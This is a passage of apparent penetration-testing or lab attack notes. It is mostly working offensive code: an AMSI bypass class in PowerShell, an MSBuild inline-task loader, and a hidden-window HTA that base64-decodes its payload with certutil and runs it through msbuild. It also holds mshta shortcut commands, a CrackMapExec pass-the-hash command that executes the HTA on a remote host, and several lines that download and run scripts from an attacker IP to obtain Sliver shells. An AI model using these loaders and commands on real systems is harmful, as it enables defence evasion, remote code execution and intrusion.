            CONTEXT64_FULL = CONTEXT64_CONTROL | CONTEXT64_INTEGER | CONTEXT64_FLOATING_POINT,
            CONTEXT64_ALL = CONTEXT64_CONTROL | CONTEXT64_INTEGER | CONTEXT64_SEGMENTS | CONTEXT64_FLOATING_POINT | CONTEXT64_DEBUG_REGISTERS
        }
 
        [StructLayout(LayoutKind.Sequential)]
        public struct M128A
        {
            public ulong High;
            public long Low;
 
            public override string ToString()
            {
                return string.Format("High:{0}, Low:{1}", this.High, this.Low);
            }
        }
 
        [StructLayout(LayoutKind.Sequential, Pack = 16)]
        public struct XSAVE_FORMAT64
        {
            public ushort ControlWord;
            public ushort StatusWord;
            public byte TagWord;
            public byte Reserved1;
            public ushort ErrorOpcode;
            public uint ErrorOffset;
            public ushort ErrorSelector;
            public ushort Reserved2;
            public uint DataOffset;
            public ushort DataSelector;
            public ushort Reserved3;
            public uint MxCsr;
            public uint MxCsr_Mask;
 
            [MarshalAs(UnmanagedType.ByValArray, SizeConst = 8)]
            public M128A[] FloatRegisters;
 
            [MarshalAs(UnmanagedType.ByValArray, SizeConst = 16)]
            public M128A[] XmmRegisters;
 
            [MarshalAs(UnmanagedType.ByValArray, SizeConst = 96)]
            public byte[] Reserved4;
        }
 
        [StructLayout(LayoutKind.Sequential, Pack = 16)]
        public struct CONTEXT64
        {
            public ulong P1Home;
            public ulong P2Home;
            public ulong P3Home;
            public ulong P4Home;
            public ulong P5Home;
            public ulong P6Home;
 
            public CONTEXT64_FLAGS ContextFlags;
            public uint MxCsr;
 
            public ushort SegCs;
            public ushort SegDs;
            public ushort SegEs;
            public ushort SegFs;
            public ushort SegGs;
            public ushort SegSs;
            public uint EFlags;
 
            public ulong Dr0;
            public ulong Dr1;
            public ulong Dr2;
            public ulong Dr3;
            public ulong Dr6;
            public ulong Dr7;
 
            public ulong Rax;
            public ulong Rcx;
            public ulong Rdx;
            public ulong Rbx;
            public ulong Rsp;
            public ulong Rbp;
            public ulong Rsi;
            public ulong Rdi;
            public ulong R8;
            public ulong R9;
            public ulong R10;
            public ulong R11;
            public ulong R12;
            public ulong R13;
            public ulong R14;
            public ulong R15;
            public ulong Rip;
 
            public XSAVE_FORMAT64 DUMMYUNIONNAME;
 
            [MarshalAs(UnmanagedType.ByValArray, SizeConst = 26)]
            public M128A[] VectorRegister;
            public ulong VectorControl;
 
            public ulong DebugControl;
            public ulong LastBranchToRip;
            public ulong LastBranchFromRip;
            public ulong LastExceptionToRip;
            public ulong LastExceptionFromRip;
        }
 
        [StructLayout(LayoutKind.Sequential)]
        public struct EXCEPTION_RECORD
        {
            public uint ExceptionCode;
            public uint ExceptionFlags;
            public IntPtr ExceptionRecord;
            public IntPtr ExceptionAddress;
            public uint NumberParameters;
            [MarshalAs(UnmanagedType.ByValArray, SizeConst = 15, ArraySubType = UnmanagedType.U4)] public uint[] ExceptionInformation;
        }
 
        [StructLayout(LayoutKind.Sequential)]
        public struct EXCEPTION_POINTERS
        {
            public IntPtr pExceptionRecord;
            public IntPtr pContextRecord;
        }
    }
}
"@
 
Add-Type -TypeDefinition $HWBP
[HWBP.Amsi]::Bypass()
(New-Object System.Net.WebClient).DownloadString('http://192.168.49.118/sliverphollow64.txt') | IEX

sliver64.xml

<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <!-- This inline task executes c# code. -->
  <!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe pshell.xml -->
   <!-- Author: Casey Smith, Twitter: @subTee -->
  <!-- License: BSD 3-Clause -->
  <Target Name="Hello">
   <FragmentExample />
   <ClassExample />
  </Target>
  <UsingTask
    TaskName="FragmentExample"
    TaskFactory="CodeTaskFactory"
    AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
    <ParameterGroup/>
    <Task>
      <Using Namespace="System" />
      <Using Namespace="System.IO" />
      <Code Type="Fragment" Language="cs">
        <![CDATA[
                Console.WriteLine("Hello From Fragment");
        ]]>
      </Code>
    </Task>
    </UsingTask>
    <UsingTask
    TaskName="ClassExample"
    TaskFactory="CodeTaskFactory"
    AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
    <Task>
      <Reference Include="System.Management.Automation" />
      <Code Type="Class" Language="cs">
        <![CDATA[
 
            using System;
            using System.IO;
            using System.Diagnostics;
            using System.Reflection;
            using System.Runtime.InteropServices;
            //Add For PowerShell Invocation
            using System.Collections.ObjectModel;
            using System.Management.Automation;
            using System.Management.Automation.Runspaces;
            using System.Text;
            using Microsoft.Build.Framework;
            using Microsoft.Build.Utilities;
 
            public class ClassExample :  Task, ITask
            {
                public override bool Execute()
                {
                    String cmd = @"(New-Object Net.WebClient).DownloadString('http://192.168.49.118/amsi64.txt') | iex";
            Runspace rs = RunspaceFactory.CreateRunspace();
            rs.Open();
            PowerShell ps = PowerShell.Create();
            ps.Runspace = rs;
            ps.AddScript(cmd);
            ps.Invoke();
            rs.Close();
            return true;
 
 
                }
 
 
            }
 
 
 
 
        ]]>
      </Code>
    </Task>
  </UsingTask>
</Project>

encode sliver64.xml

base64 -w 0 sliver64.xml > sliver_base64.txt

sliver64.hta

<html>
<head>
<script language="JScript">
var shell = new ActiveXObject("WScript.Shell");
var re = shell.Run("powershell -windowstyle hidden echo PFByb2plY3QgVG9vbHNWZXJzaW9uPSI0LjAiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL2RldmVsb3Blci9tc2J1aWxkLzIwMDMiPgogIDwhLS0gVGhpcyBpbmxpbmUgdGFzayBleGVjdXRlcyBjIyBjb2RlLiAtLT4KICA8IS0tIEM6XFdpbmRvd3NcTWljcm9zb2Z0Lk5FVFxGcmFtZXdvcms2NFx2NC4wLjMwMzE5XG1zYnVpbGQuZXhlIHBzaGVsbC54bWwgLS0+CiAgIDwhLS0gQXV0aG9yOiBDYXNleSBTbWl0aCwgVHdpdHRlcjogQHN1YlRlZSAtLT4KICA8IS0tIExpY2Vuc2U6IEJTRCAzLUNsYXVzZSAtLT4KICA8VGFyZ2V0IE5hbWU9IkhlbGxvIj4KICAgPEZyYWdtZW50RXhhbXBsZSAvPgogICA8Q2xhc3NFeGFtcGxlIC8+CiAgPC9UYXJnZXQ+CiAgPFVzaW5nVGFzawogICAgVGFza05hbWU9IkZyYWdtZW50RXhhbXBsZSIKICAgIFRhc2tGYWN0b3J5PSJDb2RlVGFza0ZhY3RvcnkiCiAgICBBc3NlbWJseUZpbGU9IkM6XFdpbmRvd3NcTWljcm9zb2Z0Lk5ldFxGcmFtZXdvcmtcdjQuMC4zMDMxOVxNaWNyb3NvZnQuQnVpbGQuVGFza3MudjQuMC5kbGwiID4KICAgIDxQYXJhbWV0ZXJHcm91cC8+CiAgICA8VGFzaz4KICAgICAgPFVzaW5nIE5hbWVzcGFjZT0iU3lzdGVtIiAvPgogICAgICA8VXNpbmcgTmFtZXNwYWNlPSJTeXN0ZW0uSU8iIC8+CiAgICAgIDxDb2RlIFR5cGU9IkZyYWdtZW50IiBMYW5ndWFnZT0iY3MiPgogICAgICAgIDwhW0NEQVRBWwogICAgICAgICAgICAgICAgQ29uc29sZS5Xcml0ZUxpbmUoIkhlbGxvIEZyb20gRnJhZ21lbnQiKTsKICAgICAgICBdXT4KICAgICAgPC9Db2RlPgogICAgPC9UYXNrPgogICAgPC9Vc2luZ1Rhc2s+CiAgICA8VXNpbmdUYXNrCiAgICBUYXNrTmFtZT0iQ2xhc3NFeGFtcGxlIgogICAgVGFza0ZhY3Rvcnk9IkNvZGVUYXNrRmFjdG9yeSIKICAgIEFzc2VtYmx5RmlsZT0iQzpcV2luZG93c1xNaWNyb3NvZnQuTmV0XEZyYW1ld29ya1x2NC4wLjMwMzE5XE1pY3Jvc29mdC5CdWlsZC5UYXNrcy52NC4wLmRsbCIgPgogICAgPFRhc2s+CiAgICAgIDxSZWZlcmVuY2UgSW5jbHVkZT0iU3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbiIgLz4KICAgICAgPENvZGUgVHlwZT0iQ2xhc3MiIExhbmd1YWdlPSJjcyI+CiAgICAgICAgPCFbQ0RBVEFbCgogICAgICAgICAgICB1c2luZyBTeXN0ZW07CiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5JTzsKICAgICAgICAgICAgdXNpbmcgU3lzdGVtLkRpYWdub3N0aWNzOwogICAgICAgICAgICB1c2luZyBTeXN0ZW0uUmVmbGVjdGlvbjsKICAgICAgICAgICAgdXNpbmcgU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzOwogICAgICAgICAgICAvL0FkZCBGb3IgUG93ZXJTaGVsbCBJbnZvY2F0aW9uCiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5Db2xsZWN0aW9ucy5PYmplY3RNb2RlbDsKICAgICAgICAgICAgdXNpbmcgU3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbjsKICAgICAgICAgICAgdXNpbmcgU3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbi5SdW5zcGFjZXM7CiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5UZXh0OwogICAgICAgICAgICB1c2luZyBNaWNyb3NvZnQuQnVpbGQuRnJhbWV3b3JrOwogICAgICAgICAgICB1c2luZyBNaWNyb3NvZnQuQnVpbGQuVXRpbGl0aWVzOwoKICAgICAgICAgICAgcHVibGljIGNsYXNzIENsYXNzRXhhbXBsZSA6ICBUYXNrLCBJVGFzawogICAgICAgICAgICB7CiAgICAgICAgICAgICAgICBwdWJsaWMgb3ZlcnJpZGUgYm9vbCBFeGVjdXRlKCkKICAgICAgICAgICAgICAgIHsKICAgICAgICAgICAgICAgICAgICBTdHJpbmcgY21kID0gQCIoTmV3LU9iamVjdCBOZXQuV2ViQ2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cDovLzE5Mi4xNjguNDkuMTE4L2Ftc2k2NC50eHQnKSB8IGlleCI7CiAgICAgICAgICAgIFJ1bnNwYWNlIHJzID0gUnVuc3BhY2VGYWN0b3J5LkNyZWF0ZVJ1bnNwYWNlKCk7CiAgICAgICAgICAgIHJzLk9wZW4oKTsKICAgICAgICAgICAgUG93ZXJTaGVsbCBwcyA9IFBvd2VyU2hlbGwuQ3JlYXRlKCk7CiAgICAgICAgICAgIHBzLlJ1bnNwYWNlID0gcnM7CiAgICAgICAgICAgIHBzLkFkZFNjcmlwdChjbWQpOwogICAgICAgICAgICBwcy5JbnZva2UoKTsKICAgICAgICAgICAgcnMuQ2xvc2UoKTsKICAgICAgICAgICAgcmV0dXJuIHRydWU7CgoKICAgICAgICAgICAgICAgIH0KCgogICAgICAgICAgICB9CgoKCgogICAgICAgIF1dPgogICAgICA8L0NvZGU+CiAgICA8L1Rhc2s+CiAgPC9Vc2luZ1Rhc2s+CjwvUHJvamVjdD4K > c:\\windows\\temp\\enc6.txt;certutil -decode c:\\windows\\temp\\enc6.txt c:\\windows\\temp\\g.xml;C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\msbuild.exe C:\\windows\\temp\\g.xml")
</script>
</head>
<body>
<script language="JScript">
self.close();
</script>
</body>
</html>

Create shortcut file

C:\Windows\System32\mshta.exe http://192.168.49.118/sliver64.hta

Sharp.ps1

# PowerShell script to download and execute a script from a specified URL
$url = "http://192.168.49.118/amsi64.txt"
$scriptContent = (New-Object System.Net.WebClient).DownloadString($url)
Invoke-Expression $scriptContent

Getting Shells

cme smb 172.16.225.194 -u 'Administrator' -H f99529e42ee77dc4704c568ba9320a34 --local-auth -x "C:\Windows\System32\mshta.exe http://192.168.49.118/sliver64.hta"

(New-Object System.Net.WebClient).DownloadString('http://192.168.49.118/amsi64.txt') | IEX

powershell%20%22IEX%20(New-Object%20System.Net.WebClient).DownloadString(%27http://192.168.49.118:80/amsi64.txt%27)%22

powershell "IEX (New-Object System.Net.WebClient).DownloadString('http://192.168.49.118:80/amsi64.txt')"